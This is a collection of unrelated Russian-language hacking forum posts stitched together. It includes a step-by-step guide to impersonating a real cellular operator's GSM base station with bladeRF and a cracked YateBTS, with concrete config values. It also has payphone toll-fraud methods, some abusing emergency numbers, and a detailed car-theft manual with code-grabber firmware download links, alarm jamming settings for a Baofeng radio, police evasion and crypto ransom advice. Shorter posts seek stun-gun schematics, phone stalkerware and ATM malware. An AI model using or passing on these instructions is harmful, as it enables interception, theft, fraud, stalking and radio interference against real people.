LTE IMSI Catcher это не миф!

Из-за природы базовых станций LTE захват номеров IMSI кажется невозможным. Станции LTE используют GUTI для связи с пользователями вместо IMSI. GUTI содержит временный номер IMSI, называемый T-IMSI. Это позволяет оператору выяснить, кто находится на соответствующей станции LTE, кто уполномочен запрашивать информацию T-IMSI.

GSM base station search tool
GSM IMSI catcher
FM transmitter
GPS Spoofer
Generic narrow-band signal jammer

народ. нужна схема электрошокера,
желательно простая :help:
З.Ы. гопы достали

Кто нибудь знает как можно определить оператора (US) по номеру телефона, а так же понять мобильный это или городской. (без специальных сервисов)
заранее благодарю.

Люди! Поделитесь инфой по поводу улучшения приёма сигнала мобилы.
Наверно многие оказывались в ситуации, когда приходится куда-нить ехать, а там приём как из бочки :shit:
Так что подскажите что делать.

Видел на одном канале интервью челика, который из телефона делает терминал или хороший анти-детект телефон с возможность на лету менять все параметры (IMEI и.т.д) , продает такие за 20-50к$(Ну и соответсвенно там очень хорошая проходимость на таких мобилках), так вот, он назвал XiaomiRedmi 9 в интервью идеальным, по его мнению, кандидатом на должность анти-детект телефона. И вот я сейчас в поиске идеального аппарата с гибкой и дружелюбной оболочкой для переустановки прошивок и прочего, чтобы и устройство само отвечало современным стандартам в том числе. Кароче хочу собрать себе похожую мобилку, но не желаю башлять такие деньги и взаимодействовать с этим алконафтом, и самому разобраться попутно в том числе (Репутация у персонажа вообще не очень, но работает как-то).

Всем привет, ребята посоветуете какую программу можно установить на сторонний андроид что бы потом отслеживать переписки , звонки, место положение, со своего телефона?

Вот и еще одна статья на тему bladeRF. Недавно я показал как с помощью bladeRF можно поднять свою GSM станцию. Сегодня мы рассмотрим как настроить Yate таким образом чтобы она стала клоном действующей сотовой сети.

Суть атаки заключаться в том чтобы подделать базовую станцию реального оператора и тем самым выдать себя за оригинал. Для последующего подключение телефона в автоматическом режиме к нашей станции.

Теория:
Чтобы подделать базовую станцию реального оператора мобильной связи, необходимо смоделировать Home Network Identity (HNI) целевой сети.

HNI - это комбинация MCC (код страны мобильной связи) и MNC (код мобильной сети). Это номер, который идентифицирует сеть абонента, также известную как PLMN (Public Land Mobile Network).

Комбинация, используемая для идентификации оператора мобильной сети, также называется кортежем MCC / MNC.

Mobile Country Code (MCC)
MCC расшифровывается как Mobile Country Code. Этот параметр используется для определения информации о стране и географическом регионе.

MCC состоит из трех десятичных цифр, где первая цифра обозначает географический регион, как видно из следующей таблицы:

Цифры 1 и 8 не используются.

Mobile Network Code (MNC)
MNC - это сокращение от Mobile Network Code. Этот параметр используется для однозначной идентификации конкретной PLMN в конкретной стране (определяется MCC).

Location Area Code (LAC)
Location Area Code (LAC) - это уникальный номер текущей зоны местоположения. Область местоположения - это набор базовых станций, которые сгруппированы для оптимизации сигнализации.

Location Area Identification (LAI)
Location Area Identification (LAI) - это объединение MCC, MNC и LAC. Мобильная станция использует эту информацию в качестве важной основы для выбора сети.

p.s Для лучшего понимание вы можете отдельно почитать про это. Тут я затронул краткое описание с тем минимум который нам потребуется для реализации задуманного.

Практика:
Для начало нам надо установить Yate + YateBTS и настроить. Как это сделать я описал в сатья [Поднимаем GSM станцию с помощью YateBTS и bladeRF](https://codeby.net/threads/podnimaem-gsm-stanciju-s-pomoschju- yatebts-i-bladerf.67989/) правда есть тут один нюанс. Бесплатная версия Yate и YateBTS нам не подойдет так как она урезана. Нам понадобиться взломанная версия. Скачать можно с моего репозитория n3d-b0y/evilbts.

Складируем репозиторий в домашнюю директорию: git clone https://github.com/n3d-b0y/evilbts

А дальше продолжаем установку по инструкции до пункта (Настраиваем Web GUI YateBTS). Команду sudo ln -s /usr/local/share/yate/nipc_web yatebts меняем на sudo ln -s /usr/local/share/yate/nib_web yatebts и сново продолжаем настройку по инструкции.

Подними тестовую точку и проверим что у нас все работает перед тем как приступить к следующему шагу. Если сесть с именем Test PLMN появилась и нет никаких ошибок идем дальше (если ошибки все таки есть значит что то вы настроили не так).

Перед тем как приступить к клонированию базовой станции в настройках сим карты установками предпочитаемый тип сети 2G. У меня это делаеться следующем образом:

После того как это было сделано. Нам надо получить 3 параметра MCC / MNC и LAC оператора сети которой мы хотим подделать. На Android это можно сделать двумя способами. Первый это использовать стандартный функционал вывод Access the Android Testing menu второй это установив приложение из Google Play.

Первый вариант:
набираем код ##4636## и перед нами открывается меню в маем случаи выбираю “Информация о телефоне 1” это первая сим карта в моем телефоне:

В новом окне в самом низу найдем информацию с заголовком “Статистики сети” выглядеть это будет примерно так:

Если посмотрите на имена колонок то найдете значения которые мы искали MCC / MNC и LAC. Значения будет брать из первой строчки 286 / 01 / 40500. Также отсюда нам понадобиться значения ARFCN это частота на которой мы будем вещать 44.

Второй вариант:
Устанавливаем приложение CellMapper. После установки открываем его и просматриваем все те же значения в более удобном формате:

После того как мы получили всю нужную информацию переходим к настройке YateBTS. Открываем Web интерфейс переходим на вкладку BTS Configuration и устанавливаем следующие значения:

Code:Copy to clipboard

Radio.Band: EGSM9000 - так как сеть у нас 2G (в приложении CellMapper есть поле Band Name которое подсказывает что надо выставить)
Radio.C0: 44 (это параметр ARFCN)
Identity.MCC: 286
Identity.MNC: 01
Identity.LAC: 40500

После того как все значения установили не забудьте нажать Submit. Вот мы и настроили YateBTS для подмены сотовой станции у абонента. Осталось только проверить все ли правильно мы сделали

Перед запуском Yate зайдем в настройки сим карты в раздел Мобильные сети и убедимся что у нас стоит “Выбирать сеть автоматически”

Также обратите внимание на подключенную сеть у меня это KKTCELL у вас будет ваш оператор. Запускаем Yate sudo yate -s. Буквально через 10 сек произошла подмена сети) Как можно увидеть на скриншоте ниже у меня по прежнему выбрано “Выбирать сеть автоматически” но сеть выбрана 712712.

Также надо учиться тот факт чтобы произошла подмена требуется чтобы ваш сигнал был сильнее базовой станции.

Данные действия противозаконны в любой стране и все действия вы выполняете на свой страх и риск. Я не несу ответственность за то как вы будете распоряжаться данной информацией. Если ваш сигнал слишком мощный, вы можете нарушить работу устройств в вашем радиусе. Будьте осторожны.

Click to expand...

p.s Вероятно эта последняя статья в ближайшее время связанное с bladeRF так как отпуск подходит к концу, пора уезжать с солнечного Кипра в страну для жизни)) Спасибо @HakJob за то что дал попользоваться bladeRF, без него не было этого материала.

Автор: n3d.b0y

А тем временем миру показали новую Raspberry Pi 4 с новым 4-ех ядерным Broadcom BCM2711 SoC Cortex-A72, 1.5ГГц (в 3-ке стоит Broadcom BCM2837, Cortex-A53, 1.2ГГц), увеличенным объемом ОЗУ, двумя микро HDMI, разъемом type-c и пр. Цитирую разработчиков: "производительность сопоставима с PC x86 начального уровня".

1ГБ - 35$
2ГБ - 45$
4ГБ - 55$

Click to expand...


[ Raspberry Pi 4 on sale now from $35 - Raspberry Pi

](https://www.raspberrypi.org/blog/raspberry-pi-4-on-sale-now-from-35/)

We have a surprise for you today: Raspberry Pi 4 is now on sale, starting at $35.

 www.raspberrypi.org

1 способ. Более простой - проходит только на таксофонах с входящим звонком и для этого требуется всего лишь навсего мобила поддерживающая тоновый набор.

2 способ. Чуть посложнее - проходит почти на всех таксофонах и требуются две телефонные карточки и ловкость рук J . Одна из карточек должна быть полностью пустая, а на второй должно быть РОВНО минута для звонка. Ещё раз повторю, неважно звонок по городу, по области, по стране и т.п. - РОВНО минута для предстоящего звонка.

3 способ. Самый геморройный - проходит сам не знаю на каких таксофонах, но не очень часто, и обычно на халяву идёт разговора всего лишь 59 секунд, после чего таксофон сбрасывает разговор и нужно опять париться всё сначала.

4 способ. Тоже очень геморройный – очень похож на предыдущий, но чуть-чуть отличается в деталях.

Поскольку со вторым способом я ещё до конца не разобрался, то пока его описывать не буду. Но как только разберусь что и к чему обязательно выложу!!!

И так способ первый. Мой любимый и самый простой.

Инструменты: мобила поддерживающая тоновый набор. Его поддерживает почти любая (точно знаю, что нету оного в Alcatel'ах 30х, 31х). Можно также взять на базаре, в магазине, вобщем где найдёте биппер или игрушечную мобилу которая издаёт тоновые сигналы. Тоже пойдёт J . Но настоящая мобила лучше. Почему узнаете попозже. Поэтому дальше всё буду писать для работы с мобилой.

Шаг первый - берём мобилу и включаем на ней тоновый набор.

Шаг второй и самый трудный. Как я здесь писал раньше - теперь нужно найти таксофон с входящим звонком. То есть - берём велосипед или мотороллер - кому что по карману J - и колесим по всему городу пока не найдём такой. Таксофон проверяется просто. Чтобы проверить таксофон такой он или нет - нужна таксофонная карточка. Вставляем её в таксофон и звоним себе на мобилу. Если на мобиле выбивает нормальный городской номер с кодом города, то есть уже надежда, что нужный таксофон найден. Теперь остаётся в этом убедиться. Берём мобилу и набираем полученный номер. Если при звонке уже с мобилы на этот номер таксофон звенит и показывает надпись входящий звонок, то всё Ok и таксофон с нужной прошивкой найден. (Ещё один нюанс. Будьте осторожны при звонках на таксофон, поскольку очень часто после нажатии кнопки вызова вы в динамике мобилы услышите гул или можете вообще ничего не услышать, а денюжки с вашего счёта уже будут медленно, но уверенно уходить J .) Вот теперь думаю всем понятно почему мобила лучше биппера издающего тоновые сигналы. Если же при звонке на мобилу выписывает, что номер закрыт или номер какой то не стандартный (например начинается с нуля), то скорее всего позвонить на халяву не удастся, но проверить ниже выложенный алгоритм можно, хотя скорее всего бесполезно J . Честно говоря я убил два дня катаясь по городу, но зато теперь знаю таких пять таксофонов в разных концах города. Мне пока хватает J .

А теперь самая изюминка всего нашего дела. Мы нашли нужный таксофон. И уже в предверии удачного бесплатного звонка. Желательно, чтобы то что вы будете делать видело поменьше людей, а то ведь сами знаете на счёт зависти, лишних разговоров и т.п. Делаем следующие манипуляции :

1. Снимаем трубку таксофона и держим одной рукой.

2. Другой рукой держим рычаг сброса и несколько раз быстро ударяем по нему, а потом удерживаем его рукой в состоянии трубка положена, при этом же на самом деле трубка в вашей другой руке. Если всё сделано правильно то вы можете наблюдать как на экранчике таксофона засветятся полностью все квадратики, но не чисто чёрным, а слегка серым (типа как бы была сбавлена контрастность LCD). Далее удерживая рычаг в состоянии трубка положена, примерно секунд 5-10, ждём пока таксофон не зазвенит и на экране должна появиться надпись ВХОДЯЩИЙ ЗВОНОК. Если этого не произошло повторяем пункт 2.

3. И так на экранчике появилась надпись ВХОДЯЩИЙ ЗВОНОК. Теперь сразу же отпускаем рычаг. В трубке должен слышаться непрерывный гудок, а на экранчике должен пойти отсчёт времени только не в обратную сторону, а нормальный 00:01,00:02,00:03 и т.д. Далее берём мобилу, и динамиком из которого выходят тональные звуки, ещё раз повторю – не тем в который вы слушаете разговор, а тем из которого ВЫХОДЯТ ТОНАЛЬНЫЕ ЗВУКИ (хотя у Siemens’ов они расположены рядом) приставляем к микрофону трубки таксофона. Удерживая так мобилу динамиком возле микрофона трубки таксофона (ещё раз напоминаю, так как это ОЧЕНЬ ВАЖНО И ТОЧНОСТЬ ИСПОЛНЕНИЯ ГАРАНТИРУЕТ РЕЗУЛЬТАТ, на мобиле должен быть включен тональный набор и чем побольше громкость клавиатуры, а динамик из которого выходят тональные звуки мобилы точно должен попадать в дырочки микрофона таксофона, чтобы таксофон получше воспринимал тоновые сигналы) набираем номер на который хотим позвонить на мобиле. Набирать цифры нужно с равномерным нажатием примерно 1-2 цифры за секунду. Набрав номер до конца НЕ НУЖНО на мобиле жать кнопку вызова, так как таксофон реагирует только на тоновые сигналы !!! А просто нужно убрать мобилу, а трубку таксофона уже можно приставить к уху J . Если всё сделано правильно то вы услышите как пошли гудки вызова и можете наслаждаться бесконечным разговором J !!! Для полной безопасности от чужих глаз теперь можно вставить карточку в таксофон.

P.S. Лично я всё это делаю чуть-чуть не так. Отпускать рычаг можно уже тогда когда появились на экранчике таксофона полностью все квадратики – это описано в пункте 2. А дальше всё по вышеизложенному алгоритму только уже с пункта 3 J .

Способ третий.

Набираем на таксофоне, со вставленной карточкой, номер и ждём вызова. Когда на другом конце поднимают трубку – очень резко ударяем по рычагу сброса. После это таксофон начинает перегружаться и в этот момент мы вытаскиваем карточку а также жмём много раз клавишу *, до тех пор пока таксофон не придёт в нормальное состояние. Очень важно чтобы удар был резким и кратковременным! Самое главное теперь, чтобы на другом конце за это время не положили трубку. Если после всего этого в трубке ещё слышно разговор того к кому мы звоним, то набираем один из бесплатных экстренных номеров (например у нас в Украине 01,02,03 или 04). И дальше разговариваем. Должно также пойти время 00:01,00:02,00:03 и т.д. Не знаю от чего зависит длительность разговора, но мне чаще всего не удается поговорить более 59 секунд. Иногда, было так несколько раз, время переваливает за 59 секунд и тогда можно разговаривать до безпредела долго J .

Способ четвёртый(и пока что последний L ).

Почти точная копия предыдущего, но чуточку всё нужно делать не так. Сначала нужно набирать один из бесплатных экстренных номеров (например у нас в Украине 01,02,03 или 04) и ждём вызова. Когда на другом конце поднимают трубку – очень резко ударяем по рычагу сброса. Потом резко набираем нужный нам номер (но так чтобы когда набираете цифры они появлялись на LCD). И если вызов пошёл, то наслаждаемся разговором.

Лично у меня этот способ не проходил ни разу. Да и доставать экстренные службы с их и так уж напряжённой работой не охота. Зато мой друг с успехом пользуется этим способом и говорит, что больше ему ничего и не надо. А звонит он обычно на 04 так как это газовое хозяйство и по его словам не такая уж у них и хлопотная работа. Но как говорят - это его личное дело J .

P.S. А мне больше всего нравиться первый вариант, так как он самый простой в использовании и не требуется никакой ловкости рук и всяких ударов по таксофону J .

всем привет дорогие друзья!

в интернете существует много статей,товаров,видео по поводу ,,хакерских устройств''
давайте попробую разобрать что это и зачем...
начнем с этого:

1. WiFi Pineapple Mark IV​

По сути, это обычный беспроводной роутер (на базе беспроводного чипа Atheros AR9331 SoC и процессора 400 МГц), но со специальной, основанной на OpenWRT прошивкой, в которой по умолчанию включены такие утилиты, как Karma, DNS Spoof, SSL Strip, URL Snarf, ngrep и другие. Таким образом, достаточно включить устройство, настроить интернет (все конфигурируется через веб- интерфейс) — и перехватывать данные пользователей. Роутер нуждается в питании, и это мешает его мобильности; однако существует огромное количество вариантов (что активно обсуждается на официальном форуме) использовать аккумуляторы — так называемые Battery Pack.
НО ЗАЧЕМ????
когда есть старый добрый линукс и wifite..... но если вы умеете писать прошивки на такого рода устройства то в перед!!!! а так я бы не пользовался стандартными прошивками...
если не хвататет антены на ноутбуке то есть на алиэкспресс)) wifi адаптер с режимом мониторинга. и все wifite протянет ноги до кабины пилота)

2. Ubertooth One​

с Ubertooth One можно беспрепятственно перехватывать фреймы из Bluetooth- эфира, причем использовать для этого привычные утилиты вроде Kismet. Можно девайс собрать самому, если руки растут из нужного места, или же купить готовое к использованию устройство в одном из авторизированных магазинов. ЗАЧЕМ????? линукс и в перед!!!!!!! а как вы себе это представляете ???7 чидишь в кафе, и из твоего ноута торчит антенна.... вот прям не подозрительно.................................

3-ALFA USB WiFi​

как и говорил в первом пункте вот про этот адаптер... режим мониторинга и в перед

4-USB Rubber Ducky​

всеми любимая утка
эмулирует HID-устройство (клавиатуру) и, пользуясь тем, что система воспринимает их как доверенные, эмулировать ввод, который создает в системе нужные нагрузки (например, открытие шелла). USB Rubber Ducky является аналогом Teensy. Сердце устройства — 60-мегагерцевый 32-битный AVR-микроконтроллер AT32UC3B1256, однако хардкодить что-то на низком уровне не требуется. Устройство поддерживает удивительно простой скриптовый язык Duckyscript (похожий на обычные bat-сценарии), на котором к тому же уже реализованы всевозможные пейлоады. Запустить приложение, создать Wi-Fi-бэкдор, открыть reverse-шелл — можно сделать все то же самое, как если бы ты имел физический доступ к компьютеру. Еще большую гибкость предоставляет дополнительное хранилище в виде microSD карточки, на которой можно одновременно разместить несколько пэйлоадов. прошивок в инете хоть задницуй жуй. действительно интересное устройство которое у меня есть. в нем есть смысл! если вы работаете в офисе то почему бы и нет)

5-usb rubber ducky

и начинается самое интересное. у меня у самого малина 4 на 16 гб оперативы стоит parrot os. с ней действительно много что можно делать. от сервера до анонимайзера... юзаю его как проводник между моим пк и интернетом. к нему эти устройства подключать интересною действительно есть в чем покапаться. на ,,анонимность'' ы бы присмотрел вот эту модель. например как для взломов в публичных местах.
raspberry PI 400

опять же. все это имеет смысл когда вы умеете этим пользоваться и умеете писать прошивки

p.s пишите под статьей какие хакерские устройства нужно разобрать! разберу подробно.
если кто хочет поддержать за ссылкой на донат в лс)

Привет, мальчишки и девчонки, а также их родители. Про угон автомобилей услышать не хотите ли?!

Четкое вступление. Сразу скажу - я не истина в последней инстанции, но эту тему изучал очень подробно, как и тему краж из автомобилей.
Но в этой замечательной во всех отношениях статье я расскажу про угоны.

Кто работает по теме, здесь не найдет ничего полезного и нового. Тут будет информация для тех из вас, кто неожиданно столкнулся с некоторыми финансовыми затруднениями и решил так сказать эту ситуевину исправить быстрым способом.

Если кто думает, что угоны это что то очень сложное, то не печальтесь. Я вам расскажу про самые легкие и доступные способы для самых маленьких начинающих угонщиков.

Довольно странно про это говорить в теме про угоны авто, но все таки подчеркну, чтобы угнать телегу, вам нужно уметь управлять телегами вообще в принципе. Желательно управлять хорошо, и согласно правилам пдд.

Далее, вам следует понять как из этой затеи вы будете извлекать доход. Тут вариантов не так много.

Если вдруг вы рукастый рукожоп, и пересобрать тачку вам что два пальца об асфальт и вас не пугают десятки ведер болтов и гаек, то возможно стоит рассмотреть вариант продажи авто по запчастям
Если у вас есть контакты в Казахстане, то быть может стоит подумать о перегоне авто в эту страну таможенного союза
Если вы ленивый рукастый рукожоп, то быть может сумеете переделать тачку под аля чистую и продать со скидкой аля лоху
Если пред варианты вам не подходят, то возврат за вознаграждение тоже имеет место быть

Не стоит также забывать и про вариант для себя. Вы забираете тачку под ранее купленные документы (птс + сор + госзнаки) и тихонечко не нарушая пдд ездите сами или продаете дубль другим

Безопасность и риски

Одна краденная машина вас на несколько лет не прокормит. Несколько краденных авто гарантируют вам, если прилипните, несколько безбедных лет на казерных харчах и с крышей над головой. Даже если вы ранее никогда не были судимы.

Причина в этом заключается в размере ущерба. В ситуации с угонами обычно оперируют крупным ущербом. Выдуманные истории средствами массовой информации, что мол угонщики получают условку и сьезжают по 166 статье (угон) - это истории для населения. В 90% вы пойдете по 158 ч. 3, а если будут крутить на организованную группу то по 158 ч. 4.

Поэтому самое время заикнуться о безопасности. Время до вашего задержания стремительно сокращается в геометрической прогрессии в зависимости от количества людей, осведомленных о вашей деятельности. Я даже не говорю, о том что кто то будет знать что вы именно угоняете авто. Я говорю о том, что вообще кто то будет знать что вы как то связаны с авто.

Поэтому идеальная ситуация если вы двигаетесь один, поэтому здесь и пойдет речь о работе в одного.

Выбор инструмента и метода угона

Любой авто, даже убитая в хлам копейка, представляет определенную ценность для терпилы и является такой же единицей уголовного дела как ленд крузер прадо стоимостью в два миллиона. Намек понятен? Нет?

Забирая 10 простых тазов общей стоимостью в 1 млн (твой доход 300 тыс.) - риск прилипнуть в 10 раз выше, чем забрав одну машину стоимостью в 1 млн рублей.
Если ты хочешь долго и продуктивно на радость маме и папе работать по этому направлению, необходимо соизмерять риски и правильно выбирать цели.

Самый простой способ угнать авто премиум класса или просто дороже миллиона оборудованной безключевым доступом - это удочка, короткая или длинная рука.

- работа с прибором возможна только двумя людьми. Один держит устройство возле авто, а другой со вторым устройством идет за терпилой (держит прибор возле ключа). А значит это оборудование не подпадает под вариант работы в одного (можно и в одного при определенных условиях)

Все автомобили условно можно разделить на две группы: оборудованные штатным иммобилайзером и без такового.

Машины без иммо - это в основном авто до 2006-2008 годов выпуска. В зависимости от состояния и моделей стоимостью до 400-500 тыс. рублей. Самые простые в плане угона - это японский автопром.

Машины с иммо - это такой средний класс, машины для семьи и типа того.

Выше я намекнул, что статья для новичков, поэтому я сразу буду указывать на инструмент наиболее простой для наших ваших темных делишек.

В России и странах СНГ очень и очень популярна такая сигнализация как Шерхан. Возможно вы замечали на некоторых авто на лобовухе круглые наклейки с лапкой тигра или просто круглые белые наклейки с мигающей лампочкой посередине. Так вот это и есть шерхан.

Все дело в том, что этого самого шерхана ставили и даже продолжают ставить на огромное количество автомобилей просто потоком. Просто не соблюдая никакие правила скрытой установки и тому подобное. Его ставили и ставят по инерции.

И если вы видите такой автомобиль, с наклейкой на лобовом в 90% случаев это означает потоковую установку сигнализации, даже если автомобиль ценой в 1.5 - 2 млн рублей. Это ОЧЕНЬ легкие цели, в большинстве случаев не защищенные больше ничем.

Чтобы открыть такой автомобиль, вам нужен кодграббер Шерхан ФМ, который легко делается самостоятельно.

Если очень быстро и просто описать технологию, то это примерно так:

1. Нашли цель
2. Постучали по датчику или по колесу. Кодграббер поймал сигнал
3. Сделали автозапуск.
4. Открыли авто. Свертом (если авто без кнопки старт стоп) сворачиваем личинку замка зажигания или если позволяет время под торпедой находим ключ в обходчике иммобилайзера. Если машина на кнопке старт стоп, то не нажимая педаль тормоза, удерживая кнопку shift lock переключаем коробку передач в драйв. Ручником регулируем скорость.
5. Поехали. Как только набираем 15-20 км в час можно жать на тормоз. Авто не заглохнет.

На какие авто ставили шерхан? На большинство корейских автомобилей до 2018 года. На многие форды. На японские экспортные, такие как Toyota RAV4, Camry, Land Cruiser и тому подобное.

Довольно редко, но все же встречаются европейские авто на шерханах свежих годов.

Где искать авто?

Там где много машин.

Спальные районы: вечером, после 6 часов сканируете эфир пару часиков. Кодграббер ловит в радиусе до 70 метров. Потом проходите по рядам и выбираете наиболее интересный вариант или тот который вам нужен. Или приезжаете рано утром, делаете пару проходов. Ищите глазами шерхан. Визуально изучаете цель.

Места дневных стоянок: во многих городах есть площади, бесплатные парковки, где офисный планктон или студенты бросают тачки на весь рабочий день. А также стоянки возле жд станций и станций метро, где люди оставляют утром тачки, а вечером их забирают

Места длительного отсутствия: кинотеатры, фитнес центры, бассейны, туристические маршруты, театры, филармонии, спортивные арены. Естественно тут имеет место поиск только когда проходит какое то мероприятие. А также любые крупные стоянки перед каким то массовым событием. Как то выступление рок группы в полях тьмутаракании или нерест петрушки в синем море хоббитании

Когда забирать авто?

В зависимости от выбранного места. Рано утром перед рассветом из спальных районов. Утром до обеда или после обеда с дневных парковок (в обед кто то может и к стоянке выйти и вдруг это владелец выбранной тачки).

Способы монетизации:

Покупаем колёса после пожара или жёсткой аварии она должна стоять на учёте каким-то образом и не зафиксирована как не пригодная для езды снимаем номера и ставим на сыр! Две тачки не должны одновременно ездить с одними и теми же номерами не в коем случае иначе палева по камерам и быстрая приёмка!

Отдаём клон в таксопарк, сдаём в аренду! Много тачек гонят на кавказ и за границу!

На стрелку, в розыске передвигаться, на делегу! Колёса которые можно бросить и забыть в случае чего!

Машину забираешь, ставишь и больше к ней не возвращаешься. Это под возврат.

Смысл в том, что когда ты уехал на угон еще нет заявления, а если ты будешь забирать машины которые давно стоят без движения (владелец уехал или постоянно ездит на другой и куча других вариантов), то вообще заявление может быть спустя несколько дней а то и недель. Короче, в момент угона и в течении часа, тачка еще не в розыске и ты юридически не преступник )))

Ставишь машину в соседнем районе или любом другом районе (естественно нужно избежать камер). Здесь важна безопасность добраться до точки. Если тебе безопасен соседний район, гони туда. Если на другом конце города, ставь там.

Машину фотографируешь во всех ракурсах, в том числе вещи которые там есть. В дальнейшем эти фото через анонимную почту будешь слать терпиле как подтверждение твоих слов что машина у тебя.

Больше к машине не возвращаешься, не подходишь не проверяешь двери, не трогаешь рукой, даже смотришь на нее издалека из за угла. Если тачку обнаружили, х#й с ней. В соседнем дворе стоит следующая цель. Но если ты вернешься к машине и попробуешь ее перегнать или что то с нее снять, есть очень большой шанс что за тачкой уже наблюдают!!! Или случайно ппс обнаружит или житель дома пожалуется что его место парковочное заняли или владелец найдет с помощью соц сетей. Огромное количество или может быть.

Если владелец захотел возврат (ясно дело, до угона нужно узнать максимум информации о цели, чтобы вообще понимать стоит оно того или нет), тогда возникает вопрос оплаты. Принимаешь только криптовалютой!

Создание кодграббера. Прошивки, схемы, инструкции, описание работы.

Кодграббер в брелке Шерифф ZX940

Для прошивки брелка потребуется программатор PicKit 2.
Его можно приобрести как в магазине радиодеталей, так и заказать с Алиэкспресс.

Схема подключения программатора к брелку:

Как подключили программатор к брелку, запускаем программу PicKit2 Programmer.
Стираем заводскую прошивку, записываем ту которая нам нужна.

У каждой прошивки свой список сигнализаций, которые она принимает, также в архиве есть прошивка для шлагбаумов.
Данный кодграббер работает с модуляцией AM
https://anonfiles.com/15z0zf9boa/_Sheriff_ZX-940_rar
https://anonfiles.com/H2A2z197oe/_Scher-Khan_rar

https://xssforumv3isucukbxhdhwz67ho.../12953/?hash=4f45a9e932a75ca28e4ce66e32c8443a

https://anonfiles.com/P2Baz993o6/PICkit_2_v2_Programmer_rar
Рекомендую использовать исключительно оригинальные брелки, чтобы избежать трудностей при перепрошивке.

Кодграббер в брелке Шерхан 7, 8, 9 (подойдет любой оригинальный брелок, кроме тех, у которых в серийном номере есть буквы)

Для прошивки потребуется программатор BSL, можно заказать с Алиэкспресса.

Распиновка брелка шерхан:

Как правило, новые брелки сейчас идут с защищенным от записи процессором.
Для этого нужно ознакомиться с инструкцией, как прошить защищенный процессор.
Инструкцию прилагаю.

Брелок прошивается через программу MSPfet.
Ссылка на программу: https://anonfiles.com/Za71z495o6/_rar

В архиве прошивка на 10 ячеек, пин код 123 и инструкция по прошивке защищенного процессора.

Данный кодграббер работает с модуляцией FM

https://anonfiles.com/P2Baz993o6/PICkit_2_v2_Programmer_rar

Для прошивки потребуется программатор J-Link, можно также заказать с Алиэкспресс.

Распиновка программатора и брелка:

Программу для прошивки, саму прошивку, инструкцию и список поддержки прилагаю.

Программа для прошивки брелка и для программатора: https://anonfiles.com/h18dzb99oe/_D605_rar

Пин код на включение 465645

Данный кодграббер работает в AM-FM модуляции, также со штатными системами и шлагбаумами.

Кодграббер максимальный

Для создания данного кодграббера придется приложить руки.
Так как обычной перепрошивкой процессора здесь не обойтись.

В архиве приложу фотографии сборки, печатные платы в формате lay, прошивку.
Кодграббер можно собрать как на проводах, так и на плате.

Схема сборки:

Прошивается программатором PicKit 2.

Ссылка на архив максималки: https://anonfiles.com/r2z5z593o5/Maximalka_rar

Данный кодграббер работает в AM-FM модуляции, так же со штатными системами, и в режиме код подмены.

Пользуйтесь на здоровье, ни какого обмана, все прошивки рабочие.
Возможности любого из этих кодграбберов вы можете легко найти в ютубе.

https://anonfiles.com/TfA6z59eoc/_D605_rar

Рация Baofeng UV-5R.
Бюджетная рация, которую можно приобрести с Алиэкспресс.

Данная рация полезна тем, что можно прослушивать мусоров, если они общаются в аналоговом диапазоне.
И она полезна тем, что можно глушить сигнализации автомобилей.
Допустим, когда заводишь с кодграббера, чтобы владельцу не пришла обратка, глушишь рацией.
Либо заглушить штатную сигнализацию.
Ситуация: автомобиль подъехал к торговому центру, выходит владелец, ты глушишь, он этого не замечает и уходит. Автомобиль остается открытым.
Важное условие, чтобы сигнализация и рация были на одной частоте.

Большинство сигнализаций настроено на частоту 433,92, диалоговые старлайны по разному, встречал на 434,15.
Диаппазон частот у данной рации ограничен, но частоты указанные выше, попадают в её рабочий диаппазон.

Для того, чтобы полноценно использовать рацию в качестве глушилки, необходимо настроить следующие параметры:

TXP - HIGH
WN - WIDE
TOT - 600
BCL - OFF

Подскажите кто знает.

Один чел говорит что у него модифицированный winpot atm malware. И может на дистанции взломат банкомат без подключения к кабелям или USB порту. Типа через wi-fi или что там еще.

Возможно ли вообще такое?

Есть ли способы перехватить трафик с этих пожилых мадмуазелей(базовых станций операторов сотовой связи)?
Какой тип шифрования использует, как вклиниться в поток?
Нужна вся инфа касательно них.

Скриншот|Screenshot
Скриншот|Screenshot
Скриншот|Screenshot
Скриншот|Screenshot

Как в фантастическом фильме – нажимаешь на курок и взрывается шар! Научись делать такой лазер!

Сделать такой лазер можно самому, в домашних условиях из DVD привода - не обязательно рабочего. Ничего сложного нет!
Поджигает спички, лопает воздушные шарики, режет пакеты и изоленту и многое другое
Ещё им можно лопнуть шарик или лампочку в доме напротив :-D

**В архиве - видео с лазером в действии и подробная русская инструкция с картинками по его изготовлению!
**Информация о программе
Размер: 10 МБ

letitbit
скачать
depositfiles
скачать
rapidshare
скачать
​

Посмотреть на Youtube
http://ru.youtube.com/watch?v=pSEuzxsQpuA

Представь себе ситуацию: тебе надо срочно позвонить подруге, чтобы сказать ей какая она мега гирла и в таком духе и аккуратно намекнуть, то, что родоки свалили куда нить на несколько дней и ты не прочь обучить ее навыкам работы с компьютером наедине ;-)) Соткой ты по причине финансовой недостаточности еще не успел позвонить, а денег на телефонную карту нету ;-( Не расстраивайся - ведь у тебя же есть Х! Сейчас ты узнаешь о том, как не платить нашей родимой МГТС и звонить на халяву через таксофоны.

Немного теории:
Существует 2 наиболее распространенных вида карточек. Это Afnor и ISO. Первый тип карточек юзается за бугром (вообще-то это тот же ИСО, приклеенный для хитрости вверх ногами , а в России соответственно юзается ISO. На всякий случай привожу схемы обоих типов карт (мало ли!).

PINOUT (Обозначение выводов):
1: Vcc = 5V
2: R/W
3: Clock 7: I/O
4: RAS 8: Fus
5: Gnd
6: Vpp = 21V

С теорией мы немного ознакомились, теперь пора переходить к действиям! Для всей этой операции нам понадобятся: Мозги, руки, комп в рабочем состоянии, устройство для считывания карточек.

Итак, начнем рассматривать все по порядку.

Устройство для считывания карточек.
На всякий случай приведу здесь раскладку порта принтера.

Pin In/Out Signal Name
--- ------ ------------
1 I/O -STROBE
2 I/O Data Bit 0
3 I/O Data Bit 1
4 I/O Data Bit 2
5 I/O Data Bit 3
6 I/O Data Bit 4
7 I/O Data Bit 5
8 I/O Data Bit 6
9 I/O Data Bit 7
10 I -ACK
11 I BUSY
12 I PE
13 I SLCT
14 O -AUTO FEED XT
15 I -ERROR
16 O -INIT
17 O -SLCT IN
18 N/A Ground
19 N/A Ground
20 N/A Ground
21 N/A Ground
22 N/A Ground
23 N/A Ground
24 N/A Ground
25 N/A Ground

Для того, чтобы инфа с карточки считалась тебе на комп, тебе необходимо будет откомпилить в сишнике прогу reader.c. Эта прога считывает карточки и создает по ним базу данных (у каждой карточки есть срок годности - 1 год. Поэтому надо периодически обновлять базу данных!)

